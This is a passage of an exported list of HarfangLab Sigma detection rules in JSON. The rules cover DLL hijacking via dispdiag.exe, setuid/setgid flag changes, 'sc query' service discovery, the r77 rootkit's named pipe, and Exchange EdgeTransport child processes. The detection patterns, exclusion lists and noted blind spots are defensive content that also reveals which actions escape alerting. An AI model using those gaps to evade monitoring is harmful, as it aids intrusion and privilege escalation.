"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589601Z",
"creation_date": "2026-03-23T11:45:34.589605Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589617Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dispdiag.yml",
"content": "title: DLL Hijacking via dispdiag.exe\nid: bef1e86b-dd5e-45e3-b788-14d8427f649c\ndescription: |\n Detects potential Windows DLL Hijacking via dispdiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dispdiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\DXVA2.dll'\n - '\\WMICLNT.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bef1e86b-dd5e-45e3-b788-14d8427f649c",
"rule_name": "DLL Hijacking via dispdiag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dispdiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bf0f60ff-b7cf-45a4-8a3c-fc3c445d0062",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.587203Z",
"creation_date": "2026-03-23T11:45:35.297550Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297554Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1548/001/"
],
"name": "t1548_001_setuid_setgid.yml",
"content": "title: SetUID/SetGID Access Flags Set\nid: bf0f60ff-b7cf-45a4-8a3c-fc3c445d0062\ndescription: |\n Detects when the setuid and/or setgid access flags are set on a given file.\n These access flags allow a user to run a binary using the executable's owner or group permissions instead of its own, and can be a means to achieve privilege escalation by a malicious party.\n It is recommended to analyze the targeted binary as well as the parent process responsible for the setting change and look for privilege escalation and malicious binaries.\nreferences:\n - https://attack.mitre.org/techniques/T1548/001/\ndate: 2022/11/10\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.001\n - attack.t1222.002\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind: 'chmod'\n Mode:\n - '2???'\n - '4???'\n - '6???'\n Path|startswith:\n - '/home/'\n - '/root/'\n - '/opt/'\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n - '/tmp/'\n - '/var/tmp/'\n - '/run/'\n - '/var/run/'\n - '/dev/shm/'\n - '/var/www/'\n\n filter_directory:\n Path|endswith: '/'\n\n filter_recursive:\n ProcessCommandLine|contains: ' -r '\n\n exclusion_common:\n ProcessImage:\n - '/usr/bin/apptainer'\n - '/usr/bin/buildah'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n 
exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|/usr/bin/apt|'\n exclusion_rpm:\n ProcessImage: '/usr/bin/rpm'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install ' # Plesk'\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n - 'dnf upgrade'\n - 'dnf upgrade --refresh'\n - 'dnf update'\n - ProcessParentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* 
/bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n - 'dnf upgrade'\n - 'dnf upgrade --refresh'\n - 'dnf update'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n - 'dnf upgrade'\n - 'dnf upgrade --refresh'\n - 'dnf update'\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n exclusion_microdnf:\n ProcessImage: '/usr/bin/microdnf'\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n\n exclusion_image:\n ProcessImage:\n - '/usr/bin/docker'\n - '/usr/bin/dockerd-ce'\n - '*/dockerd'\n - '*/containerd'\n - '*/containerd-shim-runc-v2'\n - '/usr/bin/buildkitd'\n - '/usr/local/lsam-*/bin/chgexec'\n - '/kaniko/executor'\n - '/sbin/apk'\n - '/usr/bin/rsync'\n - '/usr/bin/tar'\n - '/usr/bin/nautilus'\n - '/usr/bin/podman'\n - '/usr/lib/openssh/sftp-server'\n - '/usr/bin/cpio'\n - '/usr/bin/cp'\n - '/usr/bin/mv'\n - '/usr/bin/fuse-overlayfs'\n - '/usr/bin/unsquashfs'\n - '/usr/bin/bsdtar'\n - 
'/usr/bin/systemd-repart'\n - '/usr/bin/coreutils'\n - '/opt/cni/bin/install' # k3s calico\n - '/usr/bin/strip'\n\n exclusion_postfix:\n ProcessCommandLine:\n - 'chmod 2755 /usr/sbin/postqueue'\n - 'chmod 2755 /usr/sbin/postdrop'\n ProcessParentCommandLine|contains: '/sh /usr/libexec/postfix/post-install create-missing set-permissions upgrade-configuration '\n exclusion_initramfs:\n ProcessImage:\n - '/usr/bin/strip'\n - '/usr/bin/cp'\n ProcessCommandLine|contains: ' /var/tmp/dracut.??????/initramfs/'\n exclusion_landscape:\n ProcessParentCommandLine: '/bin/sh /var/lib/dpkg/info/landscape-client.postinst configure'\n\n exclusion_yocto_sdk:\n # /opt/yocto/yocto-sdk/sources/poky/buildtools/sysroots/x86_64-pokysdk-linux/usr/bin/x86_64-pokysdk-linux-strip\n # /opt/yocto/yocto-sdk/build_lx2160acex7/tmp/work/lx2160acex7-fsl-linux/core-image-cmtng/1.0-r0/recipe-sysroot-native/usr/bin/python3-native/python3.8\n # /opt/yocto/kirkstone/build_lx2160acex7/tmp/work/lx2160acex7-fsl-linux/core-image-louis/1.0-r0/recipe-sysroot-native/usr/bin/dpkg\n - ProcessImage|startswith: '/opt/yocto/'\n - Path|startswith: '/opt/yocto/'\n\n exclusion_puppet:\n - ProcessImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessCommandLine|contains: '/usr/bin/puppet agent'\n - ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessParentCommandLine|contains: '/usr/bin/puppet agent'\n\n exclusion_vmware:\n ProcessCommandLine|contains: 'vmware-install'\n\n exclusion_file_roller:\n ProcessImage: '/usr/bin/file-roller'\n ProcessParentCommandLine|contains: '/lib/systemd/systemd --user'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - 
ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n\n exclusion_vtom:\n ProcessCommandLine|contains|all:\n - 'chmod 4755'\n - '/opt/vtom'\n ProcessParentCommandLine|contains: 'install_vtom'\n\n exclusion_isa:\n - ProcessParentCommandLine: '/bin/bash /etc/init.d/isa status'\n - ProcessGrandparentCommandLine: '/bin/bash /etc/init.d/isa status'\n\n exclusion_k3s_agent:\n ProcessParentImage:\n - '/var/lib/rancher/k3s/data/*/bin/k3s'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/opt/rancher/data/*/bin/k3s'\n\n exclusion_moodle:\n Path|startswith:\n - '/srv/moodle/'\n - '/var/opt/moodle/'\n\n exclusion_oc-mirror:\n ProcessImage|endswith: '/oc-mirror'\n ProcessCommandLine|contains:\n - ' --catalog'\n - ' --config'\n\n exclusion_opcon_agent:\n ProcessImage: '/tmp/opcon_agent/bin/chgexec'\n Path|startswith: '/tmp/opcon_agent/bin/'\n\n exclusion_netdata:\n ProcessParentImage: '/opt/netdata/bin/bash'\n Path|startswith: '/opt/netdata/usr/libexec/netdata/plugins.d/'\n\n exclusion_dracut:\n Path|startswith: '/var/tmp/dracut.*/initramfs/usr/bin/'\n\n exclusion_convert2rhel:\n ProcessParentCommandLine|startswith:\n - '/usr/bin/python2 /bin/convert2rhel '\n - '/usr/bin/python2 /usr/bin/convert2rhel '\n\n exclusion_bladelogic:\n Path|startswith: '/opt/bmc/bladelogic/RSCD/'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bf0f60ff-b7cf-45a4-8a3c-fc3c445d0062",
"rule_name": "SetUID/SetGID Access Flags Set",
"rule_description": "Detects when the setuid and/or setgid access flags are set on a given file.\nThese access flags allow a user to run a binary with the executable's owner or group privileges instead of their own, and are a classic means of privilege escalation for a malicious party.\nIt is recommended to analyze the targeted binary (path, owner, hash, whether it is a known system binary) as well as the parent process responsible for the permission change, and to look for privilege escalation and malicious binaries.\nNote that, to limit noise, this rule excludes package managers, container runtimes, configuration-management agents and common file-copy/archive tools (for example cp, mv, tar, rsync, cpio); a setuid binary dropped or restored through one of these tools will therefore not trigger an alert.\n",
"rule_creation_date": "2022-11-10",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1222.002",
"attack.t1548.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bfa22e53-0d1e-4743-9891-9cc61f48816f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605844Z",
"creation_date": "2026-03-23T11:45:34.605848Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605856Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/12/18/lets-opendir-some-presents-an-analysis-of-a-persistent-actors-activity/",
"https://attack.mitre.org/techniques/T1007/"
],
"name": "t1007_sc_query.yml",
"content": "title: System Service Discovered via sc.exe\nid: bfa22e53-0d1e-4743-9891-9cc61f48816f\ndescription: |\n Detects the execution of sc.exe with the 'query' argument.\n Adversaries can use this command during the discovery phase to list Windows services.\n It is recommended to analyze the parent process and execution context as well as to correlate this alert with other discovery commands executed around it.\nreferences:\n - https://thedfirreport.com/2023/12/18/lets-opendir-some-presents-an-analysis-of-a-persistent-actors-activity/\n - https://attack.mitre.org/techniques/T1007/\ndate: 2022/11/14\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\sc.exe'\n # Renamed binaries\n - OriginalFileName: 'sc.exe'\n selection_cmdline:\n CommandLine|endswith: ' query'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_grangle:\n ParentImage: '?:\\GRANGLE\\appserver\\tomcat\\\\*\\bin\\tomcat9.exe'\n\n exclusion_vtom:\n GrandparentImage: '?:\\VTOM\\ABM\\BIN\\bdaemon.exe'\n\n # Trouble Shooting Script\n exclusion_tss:\n GrandparentCommandLine: '?:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Command & ??:\\\\*\\TSS\\TSS.ps1? 
-CollectLog MCM_Report *-NewSession'\n\n # https://www.mipih.fr/\n exclusion_cariatides:\n CurrentDirectory: '?:\\CARIATIDES\\Batchs\\Exploitation\\'\n GrandparentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\taskeng.exe'\n - '?:\\Windows\\System32\\svchost.exe' # C:\\Windows\\system32\\svchost.exe -k netsvcs\n\n exclusion_trendmicro:\n ParentCommandLine|startswith:\n - '?:\\Windows\\system32\\cmd.exe /c startTMSM.bat ?:\\Program Files (x86)\\Trend Micro\\Apex One'\n - '?:\\Windows\\system32\\cmd.exe /c stopTMSM.bat ?:\\Program Files (x86)\\Trend Micro\\Apex One'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bfa22e53-0d1e-4743-9891-9cc61f48816f",
"rule_name": "System Service Discovered via sc.exe",
"rule_description": "Detects the execution of sc.exe (or a renamed copy identified by its original file name) with a command line ending in 'query', i.e. a bare 'sc query' that lists all Windows services.\nAdversaries commonly run this command during the discovery phase to enumerate services.\nNote that queries targeting a single service ('sc query <name>') or using 'queryex' do not match, and that processes whose parent or grandparent runs from Program Files are excluded to limit noise from legitimate software.\nIt is recommended to analyze the parent process and execution context as well as to correlate this alert with other discovery commands executed around it.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1007"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bfabd3f1-3818-4b6d-88d8-4d1e42ea105c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079922Z",
"creation_date": "2026-03-23T11:45:34.079924Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079929Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit",
"https://twitter.com/malmoeb/status/1523179260273254407",
"https://github.com/bytecode77/r77-rootkit",
"https://attack.mitre.org/techniques/T1014/"
],
"name": "t1014_r77_named_pipes_created.yml",
"content": "title: Named Pipe Created linked to R77 Rootkit\nid: bfabd3f1-3818-4b6d-88d8-4d1e42ea105c\ndescription: |\n Detects the creation of the '$77control' named pipe, which is associated with the r77 ring-3 (userland) rootkit.\n r77 is an open source userland rootkit that hides the presence of other software on a system by hooking multiple Windows APIs.\n It is recommended to investigate the process that created the named pipe to determine its legitimacy.\n Because the rootkit hooks user-mode APIs to hide its artefacts, process and file listings taken on the host itself may be incomplete; prefer EDR telemetry or memory analysis when triaging.\nreferences:\n - https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit\n - https://twitter.com/malmoeb/status/1523179260273254407\n - https://github.com/bytecode77/r77-rootkit\n - https://attack.mitre.org/techniques/T1014/\ndate: 2022/07/18\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1014\n - attack.execution\n - attack.t1106\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Rootkit.R77\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: named_pipe_creation\n product: windows\ndetection:\n selection:\n PipeName: '\\$77control'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bfabd3f1-3818-4b6d-88d8-4d1e42ea105c",
"rule_name": "Named Pipe Created linked to R77 Rootkit",
"rule_description": "Detects the creation of the '$77control' named pipe, which is associated with the r77 ring-3 (userland) rootkit.\nr77 is an open source userland rootkit that hides the presence of other software on a system by hooking multiple Windows APIs.\nIt is recommended to investigate the process that created the named pipe to determine its legitimacy.\nBecause the rootkit hooks user-mode APIs to hide its artefacts, process and file listings taken on the host itself may be incomplete; prefer EDR telemetry or memory analysis when triaging.\n",
"rule_creation_date": "2022-07-18",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1014",
"attack.t1106",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c00b65da-0ebe-48ef-a6ac-e68f0dac4cc9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075693Z",
"creation_date": "2026-03-23T11:45:34.075695Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075700Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf",
"https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook",
"https://attack.mitre.org/techniques/T1505/002/"
],
"name": "t1505_002_edgetransport_spawning_dangerous_processes.yml",
"content": "title: Process Started by Microsoft Exchange EdgeTransport.exe\nid: c00b65da-0ebe-48ef-a6ac-e68f0dac4cc9\ndescription: |\n Detects a process being spawned by EdgeTransport.exe.\n Attackers can install malicious TransportAgents in an compromised Exchange server. If this malicious TransportAgent spawns processes, it will spawn them under EdgeTransport.exe.\n Attackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\n The malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\n It is recommended to investigate the process started by EdgeTransport.exe to look for malicious content as well as the recent suspicious installation of new Exchange transport agents.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf\n - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook\n - https://attack.mitre.org/techniques/T1505/002/\ndate: 2022/11/08\nmodified: 2025/10/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.002\n - attack.command_and_control\n - attack.t1071.003\n - attack.t1104\n - attack.defense_evasion\n - attack.t1546.008\n - attack.collection\n - attack.t1114.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\EdgeTransport.exe'\n\n filter_edge:\n Image|endswith: '\\EdgeTransport.exe'\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n exclusion_conhost:\n Image: '?:\\Windows\\System32\\conhost.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_werfault:\n Image: '?:\\Windows\\System32\\WerFault.exe'\n CommandLine|contains: '\\WerFault.exe -u -p '\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_wermgr:\n 
Image: '?:\\Windows\\System32\\wermgr.exe'\n CommandLine|startswith: '?:\\Windows\\system32\\wermgr.exe -outproc '\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_oleconverter:\n OriginalFileName: 'OLECONVERTER.EXE'\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n exclusion_rmactivate:\n OriginalFileName: 'rmactivate_ssp.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_crossware:\n Image: '?:\\Program Files\\CrosswareMailSignature\\esig.exe'\n\n exclusion_csc:\n Image: '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\csc.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c00b65da-0ebe-48ef-a6ac-e68f0dac4cc9",
"rule_name": "Process Started by Microsoft Exchange EdgeTransport.exe",
